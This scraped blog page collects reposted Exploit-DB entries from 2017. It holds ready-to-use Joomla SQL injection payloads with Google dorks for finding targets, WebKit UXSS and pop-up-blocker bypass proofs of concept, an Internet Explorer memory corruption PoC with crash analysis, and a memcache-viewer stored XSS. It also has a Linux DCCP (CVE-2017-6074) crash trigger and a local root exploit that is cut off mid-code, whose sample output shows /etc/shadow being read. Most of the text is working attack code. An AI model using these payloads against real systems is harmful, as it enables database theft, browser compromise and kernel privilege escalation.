# # # # #
# Exploit Title: Joomla! Component Community Polls v4.5.0 - SQL Injection
# Google Dork: inurl:index.php?option=com_communitypolls
# Date: 24.02.2017
# Vendor Homepage: http://corejoomla.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/contacts-and-feedback/polls/community-polls/
# Demo: http://demo.corejoomla.com/polls.html
# Version: 4.5.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# index.php?option=com_communitypolls&view=search
# http://localhost/[PATH]/?list_filter=Ihsan_Sencan&list_filter_field=author&filter_all_keywords=1&filter_order=a.catid&filter_order_Dir=desc&catid[]=[SQL]
# 66+AND(SELECT+1+from(SELECT+COUNT(*),CONCAT((SELECT+(SELECT+(SELECT+DISTINCT+CONCAT(0x496873616e2053656e63616e,0x7e,0x27,CAST(schema_name+AS+CHAR),0x27,0x7e)+FROM+INFORMATION_SCHEMA.SCHEMATA+WHERE+table_schema!=DATABASE()+LIMIT+1,1))+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+0,1),+FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)+AND+1=1
# # # # #
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863293860
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1049
When the new page is loading, FrameLoader::clear is called to clear the old document and window.
Here's a snippet of FrameLoader::clear.
void FrameLoader::clear(Document* newDocument, bool clearWindowProperties, bool clearScriptObjects, bool clearFrameView)
{
...
// Do this after detaching the document so that the unload event works.
if (clearWindowProperties) {
InspectorInstrumentation::frameWindowDiscarded(m_frame, m_frame.document()->domWindow());
m_frame.document()->domWindow()->resetUnlessSuspendedForDocumentSuspension();
m_frame.script().clearWindowShell(newDocument->domWindow(), m_frame.document()->pageCacheState() == Document::AboutToEnterPageCache); <<-------- (1)
if (shouldClearWindowName(m_frame, *newDocument))
m_frame.tree().setName(nullAtom);
}
...
m_frame.setDocument(nullptr); <<-------- (2)
...
}
The new document's window is attached at (1) before calling |m_frame.setDocument(nullptr)| that calls unload event handlers. So in the unload event handler, we could execute arbitrary javascript code on new document's window with a javascript: URI.
Tested on Safari 10.0.2(12602.3.12.0.1).
-->
<body>
<script>
/*
Apple WebKit: UXSS via FrameLoader::clear
When the new page is loading, FrameLoader::clear is called to clear the old document and window.
Here's a snippet of FrameLoader::clear.
void FrameLoader::clear(Document* newDocument, bool clearWindowProperties, bool clearScriptObjects, bool clearFrameView)
{
...
// Do this after detaching the document so that the unload event works.
if (clearWindowProperties) {
InspectorInstrumentation::frameWindowDiscarded(m_frame, m_frame.document()->domWindow());
m_frame.document()->domWindow()->resetUnlessSuspendedForDocumentSuspension();
m_frame.script().clearWindowShell(newDocument->domWindow(), m_frame.document()->pageCacheState() == Document::AboutToEnterPageCache); <<-------- (1)
if (shouldClearWindowName(m_frame, *newDocument))
m_frame.tree().setName(nullAtom);
}
...
m_frame.setDocument(nullptr); <<-------- (2)
...
}
The new document's window is attached at (1) before calling |m_frame.setDocument(nullptr)| that calls unload event handlers. So in the unload event handler, we could execute arbitrary javascript code on new document's window with a javascript: URI.
Tested on Safari 10.0.2(12602.3.12.0.1).
*/
"use strict";
function log(txt) {
//if (Array.isArray(txt))
// txt = Array.prototype.join.call(txt, ", ");
let c = document.createElement("div");
c.innerText = "log: " + txt;
d.appendChild(c);
}
function main() {
let f = document.body.appendChild(document.createElement("iframe"));
let a = f.contentDocument.documentElement.appendChild(document.createElement("iframe"));
a.contentWindow.onunload = () => {
let b = f.contentDocument.documentElement.appendChild(document.createElement("iframe"));
b.contentWindow.onunload = () => {
f.src = "javascript:''";
let c = f.contentDocument.documentElement.appendChild(document.createElement("iframe"));
c.contentWindow.onunload = () => {
f.src = "javascript:''";
let d = f.contentDocument.appendChild(document.createElement("iframe"));
d.contentWindow.onunload = () => {
f.src = "javascript:setTimeout(eval(atob('" + btoa("(" +function () {
alert(document.location);
} + ")") + "')), 0);";
};
};
};
};
f.src = "https://abc.xyz/";
}
main();
/*
b JSC::globalFuncParseFloat
*/
</script>
</body>
# # # # #
# Exploit Title: Joomla! Component GPS Tools v4.0.1 - SQL Injection
# Google Dork: inurl:index.php?option=com_gpstools
# Date: 24.02.2017
# Vendor Homepage: http://corejoomla.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/maps-a-weather/maps-a-locations/gps-tools/
# Demo: http://demo.corejoomla.com/tracks.html
# Version: 4.0.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# index.php?option=com_gpstools&view=search
# http://localhost/[PATH]/?list_filter=Ihsan_Sencan&list_filter_field=author&filter_all_keywords=1&filter_order=a.catid&filter_order_Dir=desc&catid[]=[SQL]
# 66+AND(SELECT+1+from(SELECT+COUNT(*),CONCAT((SELECT+(SELECT+(SELECT+DISTINCT+CONCAT(0x496873616e2053656e63616e,0x7e,0x27,CAST(schema_name+AS+CHAR),0x27,0x7e)+FROM+INFORMATION_SCHEMA.SCHEMATA+WHERE+table_schema!=DATABASE()+LIMIT+1,1))+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+0,1),+FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)+AND+1=1
# # # # #
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1050
The second argument of window.open is a name for the new window. If there's a frame that has same name, it will try to load the URL in that. If not, it just tries to create a new window and pop-up. But without the user's click event, its attempt will fail.
Here's some snippets.
RefPtr<DOMWindow> DOMWindow::open(const String& urlString, const AtomicString& frameName, const String& windowFeaturesString,
DOMWindow& activeWindow, DOMWindow& firstWindow)
{
...
---------------- (1) -----------------------
if (!firstWindow.allowPopUp()) { <<---- checks there's the user's click event.
// Because FrameTree::find() returns true for empty strings, we must check for empty frame names.
// Otherwise, illegitimate window.open() calls with no name will pass right through the popup blocker.
if (frameName.isEmpty() || !m_frame->tree().find(frameName))
return nullptr;
}
--------------------------------------------
...
RefPtr<Frame> result = createWindow(urlString, frameName, parseWindowFeatures(windowFeaturesString), activeWindow, *firstFrame, *m_frame);
return result ? result->document()->domWindow() : nullptr;
}
RefPtr<Frame> DOMWindow::createWindow(const String& urlString, const AtomicString& frameName, const WindowFeatures& windowFeatures, DOMWindow& activeWindow, Frame& firstFrame, Frame& openerFrame, std::function<void (DOMWindow&)> prepareDialogFunction)
{
...
RefPtr<Frame> newFrame = WebCore::createWindow(*activeFrame, openerFrame, frameRequest, windowFeatures, created);
if (!newFrame)
return nullptr;
...
}
RefPtr<Frame> createWindow(Frame& openerFrame, Frame& lookupFrame, const FrameLoadRequest& request, const WindowFeatures& features, bool& created)
{
ASSERT(!features.dialog || request.frameName().isEmpty());
created = false;
---------------- (2) -----------------------
if (!request.frameName().isEmpty() && request.frameName() != "_blank") {
if (RefPtr<Frame> frame = lookupFrame.loader().findFrameForNavigation(request.frameName(), openerFrame.document())) {
if (request.frameName() != "_self") {
if (Page* page = frame->page())
page->chrome().focus();
}
return frame;
}
}
--------------------------------------------
<<<<<----------- failed to find the frame, creates a new one.
...
}
The logic of the code (1) depends on the assumption that if |m_frame->tree().find(frameName)| succeeds, |lookupFrame.loader().findFrameForNavigation| at (2) will also succeed. If we could make |m_frame->tree().find(frameName)| succeed but |lookupFrame.loader().findFrameForNavigation| fail, a new window will be created and popped up without the user's click event.
Let's look into |findFrameForNavigation|.
Frame* FrameLoader::findFrameForNavigation(const AtomicString& name, Document* activeDocument)
{
Frame* frame = m_frame.tree().find(name);
// FIXME: Eventually all callers should supply the actual activeDocument so we can call canNavigate with the right document.
if (!activeDocument)
activeDocument = m_frame.document();
if (!activeDocument->canNavigate(frame))
return nullptr;
return frame;
}
bool Document::canNavigate(Frame* targetFrame)
{
...
if (isSandboxed(SandboxNavigation)) { <<<--------------- (1)
if (targetFrame->tree().isDescendantOf(m_frame))
return true;
const char* reason = "The frame attempting navigation is sandboxed, and is therefore disallowed from navigating its ancestors.";
if (isSandboxed(SandboxTopNavigation) && targetFrame == &m_frame->tree().top())
reason = "The frame attempting navigation of the top-level window is sandboxed, but the 'allow-top-navigation' flag is not set.";
printNavigationErrorMessage(targetFrame, url(), reason);
return false;
}
...
if (canAccessAncestor(securityOrigin(), targetFrame)) <<<------------------- (2)
return true;
...
return false;
}
There are two points to make |Document::canNavigate| return false.
(1). Using a sandboxed iframe.
<body>
<iframe name="one"></iframe>
<iframe id="two" sandbox="allow-scripts allow-same-origin allow-popups"></iframe>
<script>
function main() {
two.eval('open("https://abc.xyz", "one");');
}
main()
</script>
</body>
(2). Using a cross-origin iframe.
-->
<body>
<iframe name="one"></iframe>
<script>
function main() {
document.body.appendChild(document.createElement("iframe")).contentDocument.location =
"data:text/html,<script>open('https://abc.xyz', 'one')</scri" + "pt>";
}
main()
</script>
</body>
<!--
Tested on Safari 10.0.2 (12602.3.12.0.1).
-->
# # # # #
# Exploit Title: Joomla! Component Community Quiz v4.3.5 - SQL Injection
# Google Dork: inurl:index.php?option=com_communityquiz
# Date: 24.02.2017
# Vendor Homepage: http://corejoomla.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/living/education-a-culture/community-quiz/
# Demo: http://demo.corejoomla.com/quiz.html
# Version: 4.3.5
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# index.php?option=com_communityquiz&view=search
# http://localhost/[PATH]/?list_filter=Ihsan_Sencan&list_filter_field=title&filter_all_keywords=1&filter_order=a.created&filter_order_Dir=asc&catid[]=[SQL]&view=quizzes
# 66+AND(SELECT+1+from(SELECT+COUNT(*),CONCAT((SELECT+(SELECT+(SELECT+DISTINCT+CONCAT(0x496873616e2053656e63616e,0x7e,0x27,CAST(schema_name+AS+CHAR),0x27,0x7e)+FROM+INFORMATION_SCHEMA.SCHEMATA+WHERE+table_schema!=DATABASE()+LIMIT+1,1))+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+0,1),+FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)+AND+1=1
# # # # #
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1057
Here's a snippet of Frame::setDocument.
void Frame::setDocument(RefPtr<Document>&& newDocument)
{
ASSERT(!newDocument || newDocument->frame() == this);
if (m_doc && m_doc->pageCacheState() != Document::InPageCache)
m_doc->prepareForDestruction();
m_doc = newDocument.copyRef();
...
}
Before setting |m_doc| to |newDocument|, it calls |prepareForDestruction| that fires unload event handlers. If we call |Frame::setDocument| with the new document |a|, and call |Frame::setDocument| again with the new document |b| in the unload event handler. Then |prepareForDestruction| will be never called on |b|, which means the frame will be never detached from |b|.
PoC:
-->
"use strict";
let f = document.documentElement.appendChild(document.createElement("iframe"));
let a = f.contentDocument.documentElement.appendChild(document.createElement("iframe"));
a.contentWindow.onunload = () => {
f.src = "javascript:''";
let b = f.contentDocument.appendChild(document.createElement("iframe"));
b.contentWindow.onunload = () => {
f.src = "javascript:''";
let doc = f.contentDocument;
f.onload = () => {
f.onload = () => {
f.onload = null;
let s = doc.createElement("form");
s.action = "javascript:alert(location)";
s.submit();
};
f.src = "https://abc.xyz/";
};
};
};
f.src = "javascript:''";
<!--
Tested on Safari 10.0.2(12602.3.12.0.1).
-->
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1011
PoC:
-->
<!-- saved from url=(0014)about:internet -->
<style>
.class1 { float: left; column-count: 5; }
.class2 { column-span: all; columns: 1px; }
table {border-spacing: 0px;}
</style>
<script>
function boom() {
document.styleSheets[0].media.mediaText = "aaaaaaaaaaaaaaaaaaaa";
th1.align = "right";
}
</script>
<body onload="setInterval(boom,100)">
<table cellspacing="0">
<tr class="class1">
<th id="th1" colspan="5" width=0></th>
<th class="class2" width=0><div class="class2"></div></th>
<!--
Note: The analysis below is based on an 64-bit IE (running in single process mode) running on Windows Server 2012 R2. Microsoft Symbol Server has been down for several days and that's the only configuration for which I had up-to-date symbols. However Microsoft Edge and 32-bit IE 11 should behave similarly.
The PoC crashes in
MSHTML!Layout::MultiColumnBoxBuilder::HandleColumnBreakOnColumnSpanningElement
when reading from address 0000007800000070
(5fc.8a4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
MSHTML!Layout::MultiColumnBoxBuilder::HandleColumnBreakOnColumnSpanningElement+0xa4:
00007ffe`8f330a59 48833800 cmp qword ptr [rax],0 ds:00000078`00000070=????????????????
With the following call stack:
Child-SP RetAddr Call Site
00000071`0e75b960 00007ffe`8f3f1836 MSHTML!Layout::MultiColumnBoxBuilder::HandleColumnBreakOnColumnSpanningElement+0xa4
00000071`0e75b9c0 00007ffe`8e9ba9df MSHTML!`CBackgroundInfo::Property<CBackgroundImage>'::`7'::`dynamic atexit destructor for 'fieldDefaultValue''+0x641fc
00000071`0e75ba50 00007ffe`8f05393f MSHTML!Layout::FlowBoxBuilder::MoveToNextPosition+0x1b5
00000071`0e75bb10 00007ffe`8f0537e9 MSHTML!Layout::LayoutBuilder::EnterBlock+0x147
00000071`0e75bbb0 00007ffe`8f278243 MSHTML!Layout::LayoutBuilder::Move+0x77
00000071`0e75bbe0 00007ffe`8e9b364f MSHTML!Layout::LayoutBuilderDriver::BuildPageLayout+0x19d
00000071`0e75bcc0 00007ffe`8e9b239c MSHTML!Layout::PageCollection::FormatPage+0x1f3
00000071`0e75be60 00007ffe`8e9affd1 MSHTML!Layout::PageCollection::LayoutPagesCore+0x38c
00000071`0e75c030 00007ffe`8e9b099b MSHTML!Layout::PageCollection::LayoutPages+0x102
00000071`0e75c090 00007ffe`8e9aff45 MSHTML!CMarkupPageLayout::CalcPageLayoutSize+0x50b
00000071`0e75c220 00007ffe`8ea74047 MSHTML!CMarkupPageLayout::CalcTopLayoutSize+0xd5
00000071`0e75c2f0 00007ffe`8ea73c95 MSHTML!CMarkupPageLayout::DoLayout+0xf7
00000071`0e75c360 00007ffe`8e98066d MSHTML!CView::ExecuteLayoutTasks+0x17c
00000071`0e75c3f0 00007ffe`8e983b7a MSHTML!CView::EnsureView+0x43f
00000071`0e75c4d0 00007ffe`8e97f82b MSHTML!CPaintController::EnsureView+0x58
00000071`0e75c500 00007ffe`8ea2e47e MSHTML!CPaintBeat::OnBeat+0x41b
00000071`0e75c580 00007ffe`8ea2e414 MSHTML!CPaintBeat::OnPaintTimer+0x5a
00000071`0e75c5b0 00007ffe`8f2765dc MSHTML!CContainedTimerSink<CPaintBeat>::OnTimerMethodCall+0xdb
00000071`0e75c5e0 00007ffe`8e969d52 MSHTML!GlobalWndOnPaintPriorityMethodCall+0x1f7
00000071`0e75c690 00007ffe`afc13fe0 MSHTML!GlobalWndProc+0x1b8
00000071`0e75c710 00007ffe`afc13af2 USER32!UserCallWinProcCheckWow+0x1be
00000071`0e75c7e0 00007ffe`afc13bbe USER32!DispatchClientMessage+0xa2
00000071`0e75c840 00007ffe`b2352524 USER32!_fnDWORD+0x3e
00000071`0e75c8a0 00007ffe`afc1cfaa ntdll!KiUserCallbackDispatcherContinue
00000071`0e75c928 00007ffe`afc1cfbc USER32!ZwUserDispatchMessage+0xa
00000071`0e75c930 00007ffe`95d1bb28 USER32!DispatchMessageWorker+0x2ac
00000071`0e75c9b0 00007ffe`95d324cb IEFRAME!CTabWindow::_TabWindowThreadProc+0x555
00000071`0e75fc30 00007ffe`aa81572f IEFRAME!LCIETab_ThreadProc+0x3a3
00000071`0e75fd60 00007ffe`9594925f iertutil!Microsoft::WRL::ActivationFactory<Microsoft::WRL::Implements<Microsoft::WRL::FtmBase,Windows::Foundation::IUriRuntimeClassFactory,Microsoft::WRL::Details::Nil,Microsoft::WRL::Details::Nil,Microsoft::WRL::Details::Nil,Microsoft::WRL::Details::Nil,Microsoft::WRL::Details::Nil,Microsoft::WRL::Details::Nil,Microsoft::WRL::Details::Nil,Microsoft::WRL::Details::Nil>,Windows::Foundation::IUriEscapeStatics,Microsoft::WRL::Details::Nil,0>::GetTrustLevel+0x5f
00000071`0e75fd90 00007ffe`b1d313d2 IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x9f
00000071`0e75fde0 00007ffe`b22d54e4 KERNEL32!BaseThreadInitThunk+0x22
00000071`0e75fe10 00000000`00000000 ntdll!RtlUserThreadStart+0x34
And the following register values:
rax=0000007800000070 rbx=0000000000000064 rcx=0000007800000050
rdx=0000000000000048 rsi=00000079164a8f01 rdi=00007ffe8f9f81b0
rip=00007ffe8f330a59 rsp=000000710e75b960 rbp=0000007916492fe8
r8=0000007916490ec0 r9=000000710e75b980 r10=00000079164a8f30
r11=000000710e75b928 r12=000000710e75c000 r13=0000007916450fc8
r14=000000791648ec60 r15=0000007911ec9f50
Edge should crash when reading the same address while 32-bit IE tab process should crash in the same place but when reading a lower address.
Let's take a look at the code around the rip of the crash.
00007ffe`8f330a51 488bcd mov rcx,rbp
00007ffe`8f330a54 e8873c64ff call MSHTML!Layout::Patchable<Layout::PatchableArrayData<Layout::MultiColumnBox::SMultiColumnBoxItem> >::Readable (00007ffe`8e9746e0)
00007ffe`8f330a59 48833800 cmp qword ptr [rax],0 ds:00000078`00000070=????????????????
00007ffe`8f330a5d 743d je MSHTML!Layout::MultiColumnBoxBuilder::HandleColumnBreakOnColumnSpanningElement+0xe7 (00007ffe`8f330a9c)
00007ffe`8f330a5f 488bcd mov rcx,rbp
00007ffe`8f330a62 e8793c64ff call MSHTML!Layout::Patchable<Layout::PatchableArrayData<Layout::MultiColumnBox::SMultiColumnBoxItem> >::Readable (00007ffe`8e9746e0)
00007ffe`8f330a67 488b30 mov rsi,qword ptr [rax]
00007ffe`8f330a6a 488b06 mov rax,qword ptr [rsi]
00007ffe`8f330a6d 488bb848030000 mov rdi,qword ptr [rax+348h]
00007ffe`8f330a74 488bcf mov rcx,rdi
00007ffe`8f330a77 ff155b95d700 call qword ptr [MSHTML!_guard_check_icall_fptr (00007ffe`900a9fd8)]
00007ffe`8f330a7d 488bce mov rcx,rsi
00007ffe`8f330a80 ffd7 call rdi
On 00007ffe`8f330a51 rxc is read from rbp and MSHTML!Layout::Patchable<Layout::PatchableArrayData<Layout::MultiColumnBox::SMultiColumnBoxItem> >::Readable is called which sets up rax. rcx is supposed to point to another object type, but in the PoC it points to an array of 32-bit integers allocated in Array<Math::SLayoutMeasure>::Create. This array stores offsets of table columns and the values can be controlled by an attacker (with some limitations).
On 00007ffe`8f330a59 the crash occurs because rax points to uninitialized memory.
However, an attacker can affect rax by modifying table properties such as border-spacing and the width of the firs th element. Let's see what happens if an attacker can point rax to the memory he/she controls.
Assuming an attacker can pass a check on line 00007ffe`8f330a59, MSHTML!Layout::Patchable<Layout::PatchableArrayData<Layout::MultiColumnBox::SMultiColumnBoxItem> >::Readable is called again with the same arguments. After that, through a series of dereferences starting from rax, a function pointer is obtained and stored in rdi. A CFG check is made on that function pointer and, assuming it passes, the attacker-controlled function pointer is called on line 00007ffe`8f330a80.
-->
# Exploit Title: memcache-viewer - Stored XSS
# Date: 2017-02-24
# Exploit Author: HaHwul
# Exploit Author Blog: www.hahwul.com
# Vendor Homepage: https://github.com/chrisjameskirkham/memcache-viewer
# Software Link: https://github.com/chrisjameskirkham/memcache-viewer/archive/master.zip
# Version: Latest commit
# Tested on: Debian [wheezy]
### Vulnerability
This program does not filter filtering on the special character when expressing the data from memcached on the web.
When XSS attacks and HTML code are inserted in the memcached, user who accesses the page will run the XSS code.
### Example Attack code
1. Send Payload(XSS Code) after Connecting to memcached server.
#> telnet 127.0.0.1 11211
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
add hacked<script>alert(45)</script> 0 900 2
45
STORED
2. Insert data through memcached related 3rd party application.
### Result
Access index.php after memcache-viewer login
DOM Area in index.php
<td class="key">hacked<script>alert(45)</script></td><td class="slab">2</td><td class="size">2</td>
//
// EDB Note: More information ~ http://seclists.org/oss-sec/2017/q1/471
//
// A trigger for CVE-2017-6074, crashes kernel.
// Tested on 4.4.0-62-generic #83-Ubuntu kernel.
// https://github.com/xairy/kernel-exploits/tree/master/CVE-2017-6074
//
// Andrey Konovalov <andreyknvl@gmail.com>
#define _GNU_SOURCE
#include <netinet/ip.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <stdarg.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>
int main() {
struct sockaddr_in6 sa1;
sa1.sin6_family = AF_INET6;
sa1.sin6_port = htons(20002);
inet_pton(AF_INET6, "::1", &sa1.sin6_addr);
sa1.sin6_flowinfo = 0;
sa1.sin6_scope_id = 0;
int optval = 8;
int s1 = socket(PF_INET6, SOCK_DCCP, IPPROTO_IP);
bind(s1, &sa1, 0x20);
listen(s1, 0x9);
setsockopt(s1, IPPROTO_IPV6, IPV6_RECVPKTINFO, &optval, 4);
int s2 = socket(PF_INET6, SOCK_DCCP, IPPROTO_IP);
connect(s2, &sa1, 0x20);
shutdown(s1, SHUT_RDWR);
close(s1);
shutdown(s2, SHUT_RDWR);
close(s2);
return 0;
}
# # # # #
# Exploit Title: Joomla! Component Intranet Attendance Track v2.6.5 - SQL Injection
# Google Dork: inurl:index.php?option=com_intranet
# Date: 25.02.2017
# Vendor Homepage: http://thagatpam.in/
# Software Buy: https://extensions.joomla.org/extensions/extension/clients-a-communities/communities/intranet-attendance-track/
# Demo: http://demo4.thagatpam.in/
# Version: 2.6.5
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# Login as regular user
# http://localhost/[PATH]/index.php?option=com_intranet&view=calendar&month=3&year=[SQL]
# http://localhost/[PATH]/index.php?option=com_intranet&view=calendar&month=[SQL]
# http://localhost/[PATH]/index.php?option=com_intranet&view=weeklyattendance&layout=weeklypdf&userid=940&weekstartdate=2017-02-20&weekuptodate=[SQL]
# http://localhost/[PATH]/index.php?option=com_intranet&view=weeklyattendance&layout=weeklypdf&userid=940&weekstartdate=[SQL]
# http://localhost/[PATH]/index.php?option=com_intranet&view=payslip&layout=mypayslip&user=940&month=8&year=[SQL]
# http://localhost/[PATH]/index.php?option=com_intranet&view=payslip&layout=mypayslip&user=940&month=[SQL]
# http://localhost/[PATH]/index.php?option=com_intranet&controller=promociones&task=landing&idPromocion=[SQL]
# http://localhost/[PATH]/index.php?option=com_intranet&controller=reservas&task=paso1&tipoIdaVuelta=1&rutaSalida=20&rutaDestino=[SQL]
# http://localhost/[PATH]/index.php?option=com_intranet&controller=reservas&task=paso1&tipoIdaVuelta=1&rutaSalida=[SQL]
# Etc..
# # # # #
//
// EDB Note: More information ~ http://seclists.org/oss-sec/2017/q1/471
//
// A proof-of-concept local root exploit for CVE-2017-6074.
// Includes a semireliable SMAP/SMEP bypass.
// Tested on 4.4.0-62-generic #83-Ubuntu kernel.
// https://github.com/xairy/kernel-exploits/tree/master/CVE-2017-6074
//
// Usage:
// $ gcc poc.c -o pwn
// $ ./pwn
// [.] namespace sandbox setup successfully
// [.] disabling SMEP & SMAP
// [.] scheduling 0xffffffff81064550(0x406e0)
// [.] waiting for the timer to execute
// [.] done
// [.] SMEP & SMAP should be off now
// [.] getting root
// [.] executing 0x402043
// [.] done
// [.] should be root now
// [.] checking if we got root
// [+] got r00t ^_^
// [!] don't kill the exploit binary, the kernel will crash
// # cat /etc/shadow
// ...
// daemon:*:17149:0:99999:7:::
// bin:*:17149:0:99999:7:::
// sys:*:17149:0:99999:7:::
// sync:*:17149:0:99999:7:::
// games:*:17149:0:99999:7:::
// ...
//
// Andrey Konovalov <andreyknvl@gmail.com>
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdarg.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sched.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <arpa/inet.h>
#include <linux/if_packet.h>
#include <netinet/if_ether.h>
#define SMEP_SMAP_BYPASS 1
// Needed for local root.
#define COMMIT_CREDS 0xffffffff810a2840L
#define PREPARE_KERNEL_CRED 0xffffffff810a2c30L
#define SHINFO_OFFSET 1728
// Needed for SMEP_SMAP_BYPASS.
#define NATIVE_WRITE_CR4 0xffffffff81064550ul
#define CR4_DESIRED_VALUE 0x406e0ul
#define TIMER_OFFSET (728 + 48 + 104)
#define KMALLOC_PAD 128
#define KMALLOC_WARM 32
#define CATCH_FIRST 6
#define CATCH_AGAIN 16
#define CATCH_AGAIN_SMALL 64
// Port is incremented on each use.
static int port = 11000;
void debug(const char *msg) {
/*
char buffer[32];
snprintf(&buffer[0], sizeof(buffer), "echo '%s' > /dev/kmsg\n", msg);
system(buffer);
*/
}
// * * * * * * * * * * * * * * Kernel structs * * * * * * * * * * * * * * * *
struct ubuf_info {
uint64_t callback; // void (*callback)(struct ubuf_info *, bool)
uint64_t ctx; // void *
uint64_t desc; // unsigned long
};
struct skb_shared_info {
uint8_t nr_frags; // unsigned char
uint8_t tx_flags; // __u8
uint16_t gso_size; // unsigned short
uint16_t gso_segs; // unsigned short
uint16_t gso_type; // unsigned short
uint64_t frag_list; // struct sk_buff *
uint64_t hwtstamps; // struct skb_shared_hwtstamps
uint32_t tskey; // u32
uint32_t ip6_frag_id; // __be32
uint32_t dataref; // atomic_t
uint64_t destructor_arg; // void *
uint8_t frags[16][17]; // skb_frag_t frags[MAX_SKB_FRAGS];
};
struct ubuf_info ui;
void init_skb_buffer(char* buffer, void *func) {
memset(&buffer[0], 0, 2048);
struct skb_shared_info *ssi = (struct skb_shared_info *)&buffer[SHINFO_OFFSET];
ssi->tx_flags = 0xff;
ssi->destructor_arg = (uint64_t)&ui;
ssi->nr_frags = 0;
ssi->frag_list = 0;
ui.callback = (unsigned long)func;
}
struct timer_list {
void *next;
void *prev;
unsigned long expires;
void (*function)(unsigned long);
unsigned long data;
unsigned int flags;
int slack;
};
void init_timer_buffer(char* buffer, void *func, unsigned long arg) {
memset(&buffer[0], 0, 2048);
struct timer_list* timer = (struct timer_list *)&buffer[TIMER_OFFSET];
timer->next = 0;
timer->prev = 0;
timer->expires = 4294943360;
timer->function = func;
timer->data = arg;
timer->flags = 1;
timer->slack = -1;
}
// * * * * * * * * * * * * * * * Trigger * * * * * * * * * * * * * * * * * *
struct dccp_handle {
struct sockaddr_in6 sa;
int s1;
int s2;
};
void dccp_init(struct dccp_handle *handle, int port) {
handle->sa.sin6_family = AF_INET6;
handle->sa.sin6_port = htons(port);
inet_pton(AF_INET6, "::1", &handle->sa.sin6_addr);
handle->sa.sin6_flowinfo = 0;
handle->sa.sin6_scope_id = 0;
handle->s1 = socket(PF_INET6, SOCK_DCCP, IPPROTO_IP);
if (handle->s1 == -1) {
perror("socket(SOCK_DCCP)");
exit(EXIT_FAILURE);
}
int rv = bind(handle->s1, &handle->sa, sizeof(handle->sa));
if (rv != 0) {
perror("bind()");
exit(EXIT_FAILURE);
}
rv = listen(handle->s1, 0x9);
if (rv != 0) {
perror("listen()");
exit(EXIT_FAILURE);
}
int optval = 8;
rv = setsockopt(handle->s1, IPPROTO_IPV6, IPV6_RECVPKTINFO,
&optval, sizeof(optval));
if (rv != 0) {
perror("setsockopt(IPV6_RECVPKTINFO)");
exit(EXIT_FAILURE);
}
handle->s2 = socket(PF_INET6, SOCK_DCCP, IPPROTO_IP);
if (handle->s1 == -1) {
perror("socket(SOCK_DCCP)");
exit(EXIT_FAILURE);
}
}
void dccp_kmalloc_kfree(struct dccp_handle *handle) {
int rv = connect(handle->s2, &handle->sa, sizeof(handle->sa));
if (rv != 0) {
perror("connect(SOCK_DCCP)");
exit(EXIT_FAILURE);
}
}
void dccp_kfree_again(struct dccp_handle *handle) {
int rv = shutdown(handle->s1, SHUT_RDWR);
if (rv != 0) {
perror("shutdown(SOCK_DCCP)");
exit(EXIT_FAILURE);
}
}
void dccp_destroy(struct dccp_handle *handle) {
close(handle->s1);
close(handle->s2);
}
// * * * * * * * * * * * * * * Heap spraying * * * * * * * * * * * * * * * * *
struct udp_fifo_handle {
int fds[2];
};
void udp_fifo_init(struct udp_fifo_handle* handle) {
int rv = socketpair(AF_LOCAL, SOCK_DGRAM, 0, handle->fds);
if (rv != 0) {
perror("socketpair()");
exit(EXIT_FAILURE);
}
}
void udp_fifo_destroy(struct udp_fifo_handle* handle) {
close(handle->fds[0]);
close(handle->fds[1]);
}
void udp_fifo_kmalloc(struct udp_fifo_handle* handle, char *buffer) {
int rv = send(handle->fds[0], buffer, 1536, 0);
if (rv != 1536) {
perror("send()");
exit(EXIT_FAILURE);
}
}
void udp_fifo_kmalloc_small(struct udp_fifo_handle* handle) {
char buffer[128];
int rv = send(handle->fds[0], &buffer[0], 128, 0);
if (rv != 128) {
perror("send()");
